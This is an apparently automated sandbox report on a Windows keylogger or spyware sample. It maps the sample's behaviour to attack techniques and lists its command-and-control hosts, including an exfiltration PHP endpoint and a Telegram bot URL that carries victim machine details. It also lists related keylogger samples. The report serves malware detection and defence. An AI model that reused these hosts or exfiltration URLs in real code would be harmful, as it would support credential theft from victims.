Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	2 Process Discovery	Distributed Component Object Model	1 Email Collection	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	1 Input Capture	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	1 Clipboard Data	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
VbcXXnmIwPPhh.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://aborters.duckdns.org:8081	100%	URL Reputation	malware
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?L	0%	URL Reputation	safe
http://anotherarmy.dns.army:8081	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://varders.kozow.com:8081	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://www.office.com/	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2027/09/2024%20/%2000:14:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=en	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	unknown
reallyfreegeoip.org	188.114.96.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
mail.jhxkgroup.online	217.12.218.219	true	true	unknown
checkip.dyndns.com	132.226.8.169	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2027/09/2024%20/%2000:14:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://aborters.duckdns.org:8081	VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ac.ecosia.org/autocomplete?q=	VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/	VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://51.38.247.67:8081/_send_.php?L	VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot	VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.000000000325B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anotherarmy.dns.army:8081	VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=en	VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	VbcXXnmIwPPhh.exe, 00000000.00000002.1268385420.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://varders.kozow.com:8081	VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031FD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
217.12.218.219	mail.jhxkgroup.online	Ukraine	21100	ITLDC-NLUA	true
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519406
Start date and time:	2024-09-26 13:43:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	VbcXXnmIwPPhh.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/9@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 89 Number of non-executed functions: 18
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.210.172
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, time.windows.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: VbcXXnmIwPPhh.exe

Simulations

Behavior and APIs

Time	Type	Description
07:44:01	API Interceptor	5823262x Sleep call for process: VbcXXnmIwPPhh.exe modified
07:44:04	API Interceptor	14x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rTEKL__FTALEPVEF__YATTEKL__F__.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rPROFORMAINVOICE-PO_ATS_1036pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	z9OutstandingPayment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rPO_CW00402902400438.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	MCB_09252024.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
149.154.167.220	nBank_Report.pif.exe	Get hash	malicious	Snake Keylogger	Browse
	z1Invoice1.bat.exe	Get hash	malicious	VIP Keylogger	Browse
	ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe	Get hash	malicious	Snake Keylogger	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	https://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.com	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse
217.12.218.219	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.9884.23346.exe	Get hash	malicious	VIP Keylogger	Browse
	listener.dll.vbs	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mail.jhxkgroup.online	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	217.12.218.219
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	217.12.218.219
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	217.12.218.219
	SecuriteInfo.com.Win32.CrypterX-gen.9884.23346.exe	Get hash	malicious	VIP Keylogger	Browse	217.12.218.219
reallyfreegeoip.org	Ref_336210627.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	nBank_Report.pif.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	z1Invoice1.bat.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
	ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	RFQ____RM quotation_JPEG IMAGE.img.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
api.telegram.org	nBank_Report.pif.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	z1Invoice1.bat.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.com	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	149.154.167.220
bg.microsoft.map.fastly.net	https://finalsteptogo.com/uploads/il4.txt	Get hash	malicious	Unknown	Browse	199.232.214.172
	DropboxInstaller.exe	Get hash	malicious	Unknown	Browse	199.232.214.172
	http://t.nypost.com/1/e/r?aqet=clk&r=2&ca=35257893&v0=rhn21600@pvwfzajcv.com&yf=//youtube.com.com/q/ndppd/aanqtpx/YW1hbmRhLm1pbGxlckB5Ym9ubGluZS5jby51aw==&ru=//eddieslawn.com/q/ndppd/aanqtpx/YW1hbmRhLm1pbGxlckB5Ym9ubGluZS5jby51aw==&yf=//eduyieldyf.com/q/ndppd/aanqtpx/YW1hbmRhLm1pbGxlckB5Ym9ubGluZS5jby51aw==	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
	https://game-repack.site/2024/09/26/bloodborne	Get hash	malicious	Unknown	Browse	199.232.214.172
	http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwE	Get hash	malicious	WinSearchAbuse	Browse	199.232.210.172
	FkGxLJH08w.js	Get hash	malicious	Unknown	Browse	199.232.210.172
	yK6gQ43tQ8.js	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://centuriontm.bizarreonly.net	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	199.232.214.172
	nBank_Report.pif.exe	Get hash	malicious	Snake Keylogger	Browse	199.232.214.172
	z1Invoice1.bat.exe	Get hash	malicious	VIP Keylogger	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	nBank_Report.pif.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	z1Invoice1.bat.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://mintlink32.vercel.app/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.99
UTMEMUS	nBank_Report.pif.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	z95g0YV3PKzM3LA5zt.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
CLOUDFLARENETUS	https://41one2krrsa5qeao6vzl586pphkrbbn.planoverdesa.com.br/silionsedn/iriwgdposn/gjwofhytyv/Zoaodhuxzz/g5Altx/cmljbEBubml0LmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	http://t.nypost.com/1/e/r?aqet=clk&r=2&ca=35257893&v0=rhn21600@pvwfzajcv.com&yf=//youtube.com.com/q/ndppd/aanqtpx/YW1hbmRhLm1pbGxlckB5Ym9ubGluZS5jby51aw==&ru=//eddieslawn.com/q/ndppd/aanqtpx/YW1hbmRhLm1pbGxlckB5Ym9ubGluZS5jby51aw==&yf=//eduyieldyf.com/q/ndppd/aanqtpx/YW1hbmRhLm1pbGxlckB5Ym9ubGluZS5jby51aw==	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	rDoc5633276235623657_xls.exe	Get hash	malicious	StormKitty, XWorm	Browse	162.159.135.233
	https://game-repack.site/2024/09/26/bloodborne	Get hash	malicious	Unknown	Browse	104.21.84.200
	e.dll	Get hash	malicious	Dridex Dropper	Browse	104.21.69.9
	https://content.app-us1.com/kd4oo8/2024/09/26/7d3453ba-0845-4df1-80a7-42d15e30f736.pdf	Get hash	malicious	HTMLPhisher	Browse	104.18.38.76
	http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwE	Get hash	malicious	WinSearchAbuse	Browse	104.16.79.73
	http://ti6.htinenate.com	Get hash	malicious	Unknown	Browse	172.67.162.17
	https://coreleete.de/pt/Odrivex/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	e.dll	Get hash	malicious	Dridex Dropper	Browse	104.21.69.9
ITLDC-NLUA	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	217.12.218.219
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	217.12.218.219
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	217.12.218.219
	z1RFT798549034687-HJW90789-VXT9KGUINUII.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187
	rDFO68936OF-WVHU0780-FUIKTU4678G.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187
	BL Draft-Invoice-Packing list-Shipping Document.pif.exe	Get hash	malicious	FormBook	Browse	185.174.173.22
	SecuriteInfo.com.Win32.CrypterX-gen.9884.23346.exe	Get hash	malicious	VIP Keylogger	Browse	217.12.218.219
	SecuriteInfo.com.FileRepMalware.14031.20391.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187
	SecuriteInfo.com.FileRepMalware.19940.26551.exe	Get hash	malicious	AgentTesla	Browse	185.174.173.22
	MJI5380328-PQX82938839039-HW7V89292999.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Ref_336210627.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	nBank_Report.pif.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	z1Invoice1.bat.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.96.3
	https://docs.google.com/drawings/d/1wD-DOvNLKuM60BZj5TLzFjKI87o3EE-OVAmvFF0fxPk/preview?usp=sharing	Get hash	malicious	Unknown	Browse	188.114.96.3
	ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	RFQ____RM quotation_JPEG IMAGE.img.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	rDoc5633276235623657_xls.exe	Get hash	malicious	StormKitty, XWorm	Browse	149.154.167.220
	http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwE	Get hash	malicious	WinSearchAbuse	Browse	149.154.167.220
	sRMytgfRpJ.exe	Get hash	malicious	RedLine	Browse	149.154.167.220
	nBank_Report.pif.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	z1Invoice1.bat.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	sostener.vbs	Get hash	malicious	AsyncRAT, DcRat	Browse	149.154.167.220
	sostener.vbs	Get hash	malicious	Remcos, PureLog Stealer	Browse	149.154.167.220
	sostener.vbs	Get hash	malicious	Remcos	Browse	149.154.167.220
	asegurar.vbs	Get hash	malicious	Remcos, PureLog Stealer	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Reputation:	high, very likely benign file
